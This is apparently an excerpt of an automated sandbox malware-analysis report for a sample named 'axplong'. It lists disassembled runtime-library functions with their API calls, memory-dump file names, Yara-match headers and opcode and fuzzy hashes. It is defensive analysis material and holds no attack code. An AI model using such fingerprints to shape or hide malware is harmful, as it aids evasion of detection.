                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 20112673457b31a440e306bb8241c96983251bca509a10f41f4764c1eddee78e
                                                                                                                                                                                                                                                    • Instruction ID: a6a6b76da9d3fd6e08519f6e0232fa0e64414230ce93d2a2f68b1764c4aa6c0a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20112673457b31a440e306bb8241c96983251bca509a10f41f4764c1eddee78e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81419334A002499BCF10EF68DC84A9EBBA7BF86314F148159E8159B352DBB5EE41CF90
                                                                                                                                                                                                                                                    Function 0069DC48 Relevance: 10.6, APIs: 7, Instructions: 117threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 0069DCC1
                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 0069DCDE
                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 0069DD44
                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 0069DD59
                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 0069DD6B
                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 0069DD7B
                                                                                                                                                                                                                                                    • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 0069DDA4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2885714658-0
                                                                                                                                                                                                                                                    • Opcode ID: 1534703e5eec13defbcc7e806be24c0c1781c22f39cce9740343b3297773143e
                                                                                                                                                                                                                                                    • Instruction ID: 27b699bfd952eb6149c1378ba0fec0f3cd4e21c84b27e23e172c088b1387cd24
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1534703e5eec13defbcc7e806be24c0c1781c22f39cce9740343b3297773143e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45419A70A002449ADF55FBA485567FC77AF6F01304F1800BDE9426BAC3CB758E09CB6A
                                                                                                                                                                                                                                                    Function 0069E6DF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0069E707
                                                                                                                                                                                                                                                      • Part of subcall function 0069E474: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0069E4A7
                                                                                                                                                                                                                                                      • Part of subcall function 0069E474: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0069E4C9
                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0069E784
                                                                                                                                                                                                                                                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0069E790
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0069E79F
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0069E7A9
                                                                                                                                                                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 0069E7DD
                                                                                                                                                                                                                                                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0069E7E5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1924466884-0
                                                                                                                                                                                                                                                    • Opcode ID: 923a171a71451037f04f121c860bd6cc6107b109aa2a08449aceafab7fbd6108
                                                                                                                                                                                                                                                    • Instruction ID: 2f19f18e41df60d7b64ac4b14025b1924a610182af65698e03e836e9fd752fbb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 923a171a71451037f04f121c860bd6cc6107b109aa2a08449aceafab7fbd6108
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75415E75A00204DFDF44EFA4C495AADB7BAFF48310F1480A9DD49AB382DB34AA41CF91
                                                                                                                                                                                                                                                    Function 0068EC16 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0068EC1D
                                                                                                                                                                                                                                                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0068EC47
                                                                                                                                                                                                                                                      • Part of subcall function 0068F30D: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0068F32A
                                                                                                                                                                                                                                                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0068ECC4
                                                                                                                                                                                                                                                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0068ECF6
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0068ED1C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__freea
                                                                                                                                                                                                                                                    • String ID: !h
                                                                                                                                                                                                                                                    • API String ID: 2497068736-1755258997
                                                                                                                                                                                                                                                    • Opcode ID: fa3057b40462bf2f3c2c37ab93f93b80f35dad185508741ba05afc96ac21c1fc
                                                                                                                                                                                                                                                    • Instruction ID: b67f5d95f5d7e6de3b2f60734b8f239c7fb79a0a1ab7b844475e2fd0c947eebb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa3057b40462bf2f3c2c37ab93f93b80f35dad185508741ba05afc96ac21c1fc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2317EB1E001068FDB15EFA8C9419ADB7B6AF49310F24426EE415F7380DB759E02CBA5
